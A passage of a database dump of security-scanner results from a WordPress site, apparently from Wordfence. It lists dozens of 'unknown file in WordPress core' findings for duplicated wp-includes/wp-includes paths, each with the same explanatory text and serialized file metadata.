tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/wp-custom-header.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77900,1675048857,1675048857,'new','knownfile',75,'236743e95b6a7df6deb06f4fc1cf2721','1369267d6c6c79563b016ddd295eb874','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-custom-header.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/wp-custom-header.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77901,1675048857,1675048857,'new','knownfile',75,'26b84fa263d877625006559f504e9b5f','8c21c48addae4b464a830d3c3feda791','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed-template.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/wp-embed-template.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77902,1675048857,1675048857,'new','knownfile',75,'f97f53cb7ba1b1002dc8ddaccd08b413','3e688d1f2390968adecf40142a9351bf','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed-template.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/wp-embed-template.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77903,1675048857,1675048857,'new','knownfile',75,'01553ab04975a27d4946e4965e27794c','0c77382e852ea603c99b2c8805a2d1e8','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wp-embed.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77904,1675048857,1675048857,'new','knownfile',75,'5611d41fb390afbdc0b719371e59ff9a','861b2b0750dcf210e46d6646dd13296d','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wp-embed.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77905,1675048857,1675048857,'new','knownfile',75,'756d1c42e40922b466ab812589cfb8e9','147f1b661c1687f718d6692bfd928004','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji-loader.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/wp-emoji-loader.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77906,1675048857,1675048857,'new','knownfile',75,'2a8b31f0a8473ee45f49dcf6be6471ab','95b52cff79495743f2dcc20e435348a4','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji-loader.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/wp-emoji-loader.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77907,1675048858,1675048858,'new','knownfile',75,'d80757ab2d12753f267718bb0f11808d','cab1009c3f9152e2b635d4d0b4990cfb','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji-release.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/wp-emoji-release.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77908,1675048858,1675048858,'new','knownfile',75,'9c64678dbb8d2f86f63450232b5c7d82','65047d83bb81007c1f6589a11920d3db','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wp-emoji.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77909,1675048858,1675048858,'new','knownfile',75,'2c4267208692d7470d12f88b25399633','4ffc189aa86c697785cc5908f0f40394','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-emoji.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wp-emoji.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77910,1675048859,1675048859,'new','knownfile',75,'20c7278219bd4122e1234c960bda40cd','95403d9ab801a246a26707dadf76bc9f','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-list-revisions.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/wp-list-revisions.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77911,1675048859,1675048859,'new','knownfile',75,'6435f8996875bdc2174996fde0eed364','f25cab857dff956a0a1e14b93441efcc','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-list-revisions.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/wp-list-revisions.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77912,1675048859,1675048859,'new','knownfile',75,'2a1badde098974df2770ee829054eebd','8f77c38ce173bd92e73c4c9c15810229','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-lists.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wp-lists.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77913,1675048859,1675048859,'new','knownfile',75,'62becb0a6403117eb2d378fd68ea8279','db34de383b965e08d4806cf0bac083d8','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-lists.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wp-lists.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77914,1675048859,1675048859,'new','knownfile',75,'5028abfd9a33efe3395848ab12341a25','cc59db16f747e3c940c14dae873bac69','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-pointer.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/wp-pointer.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77915,1675048859,1675048859,'new','knownfile',75,'6718061c5a6d6ad535920740d5e5e273','2217218ecbe45d634d1bce345259ff3e','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-pointer.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/wp-pointer.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77916,1675048859,1675048859,'new','knownfile',75,'157fb2fb2e7a498ea5cad8ef5bbbe95a','df00c4c9dcb78a1c6878ecb51b5b2549','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-sanitize.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/wp-sanitize.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77917,1675048859,1675048859,'new','knownfile',75,'daf667e650737df19d69cee9151bc665','84d7b8d3fbf9f675e9d8fb19f37e601f','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-sanitize.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/wp-sanitize.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77918,1675048859,1675048859,'new','knownfile',75,'796d05a832abcdbe6f91b477df898286','3394fdacd7acacfa526d90f158bff504','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-util.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/js/wp-util.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77919,1675048860,1675048860,'new','knownfile',75,'fe07187ac8256d343a83e537935474ff','6a234ae29bb176c1059e863076fbfed9','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-util.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/wp-util.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77920,1675048860,1675048860,'new','knownfile',75,'222120ecdafd0d55df272d1107096851','5c851f90fcb798403019e480c4ab40d8','Unknown file in WordPress core: wp-includes/wp-includes/js/wpdialog.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wpdialog.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77921,1675048860,1675048860,'new','knownfile',75,'06487584f27c3d1ba2e1aa7b41d64f48','e3d74a5d14685c5611b54724e1f1abd9','Unknown file in WordPress core: wp-includes/wp-includes/js/wpdialog.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/wpdialog.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77922,1675048860,1675048860,'new','knownfile',75,'b435534457916751952eb889ec233437','361aaa3cef246f42153598ff308ae9c9','Unknown file in WordPress core: wp-includes/wp-includes/js/wplink.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/js/wplink.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77923,1675048860,1675048860,'new','knownfile',75,'f4021c299b8b2fcce58d756a57126265','4ac38834aed56f539acf3594c9f6b1c9','Unknown file in WordPress core: wp-includes/wp-includes/js/wplink.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/wplink.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77924,1675048860,1675048860,'new','knownfile',75,'b79d13b910ba0085ee14c737103c557e','2c9b549943eba61edf6a340f661f65bc','Unknown file in WordPress core: wp-includes/wp-includes/js/zxcvbn-async.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/zxcvbn-async.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77925,1675048860,1675048860,'new','knownfile',75,'224e0835a1ee69b23f3fef63a2b4ad18','e4192fce595a7366b076542fe4579fca','Unknown file in WordPress core: wp-includes/wp-includes/js/zxcvbn-async.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/zxcvbn-async.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77926,1675048860,1675048860,'new','knownfile',75,'e439f19e2fb0d45671f15c6d0ba633fd','18e4923b0f764fcf37ca7434d78d7430','Unknown file in WordPress core: wp-includes/wp-includes/js/zxcvbn.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/zxcvbn.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77927,1675048860,1675048860,'new','knownfile',75,'ac3b180de7024db8ed0490bbcf11fe69','67a4d04f4f402cf4020f4d954878804a','Unknown file in WordPress core: wp-includes/wp-includes/kses.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/kses.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77928,1675048860,1675048860,'new','knownfile',75,'50cd9e08d7213e0f3fa3d8e606f1ae53','4c500e0902ea9c6d541f513b3993f00a','Unknown file in WordPress core: wp-includes/wp-includes/l10n.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/l10n.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77929,1675048860,1675048860,'new','knownfile',75,'837423fd088bd3caae53b75d3e0a7217','1d823d53de5dab8132750329724371fb','Unknown file in WordPress core: wp-includes/wp-includes/link-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/link-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77930,1675048860,1675048860,'new','knownfile',75,'be0a3f8bae74519da81f7c5d169c0559','1d4c0c0cd5dfb45ab35d3e2357b7ddb9','Unknown file in WordPress core: wp-includes/wp-includes/load.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/load.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77931,1675048860,1675048860,'new','knownfile',75,'b68b59a8f6706ec76c13777b7c2622b9','e18aa45e2061eab8135b7a9667f95e9a','Unknown file in WordPress core: wp-includes/wp-includes/locale.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/locale.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77932,1675048860,1675048860,'new','knownfile',75,'82a9d43e90c43accde99c6f5cbfa5ae9','583603239864283a222abcc0f73c4d92','Unknown file in WordPress core: wp-includes/wp-includes/media-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/media-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77933,1675048860,1675048860,'new','knownfile',75,'2307f3de777ac210833ff74417e151bb','6b0ad5d688cae8d568bafab103d620c9','Unknown file in WordPress core: wp-includes/wp-includes/media.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/media.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77934,1675048860,1675048860,'new','knownfile',75,'5b9c29555553fc81fd7e4f8920191374','9ff20bb733dcb22d62e428451f5d4e8e','Unknown file in WordPress core: wp-includes/wp-includes/meta.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/meta.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77935,1675048861,1675048861,'new','knownfile',75,'b33f7723f1470e7ade815eb1e426eab3','d62ab94d4c45b2bd8af11a8e63ef80e1','Unknown file in WordPress core: wp-includes/wp-includes/ms-blogs.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/ms-blogs.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77936,1675048861,1675048861,'new','knownfile',75,'7157e49c363f40368ba3698f7baf1a42','bcdb048e5bbdc8933fb535dc6529e464','Unknown file in WordPress core: wp-includes/wp-includes/ms-default-constants.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ms-default-constants.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77937,1675048861,1675048861,'new','knownfile',75,'e54c9998add589ef176475364f176a74','43a8b34cdf34b18b5e3627806673423c','Unknown file in WordPress core: wp-includes/wp-includes/ms-default-filters.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 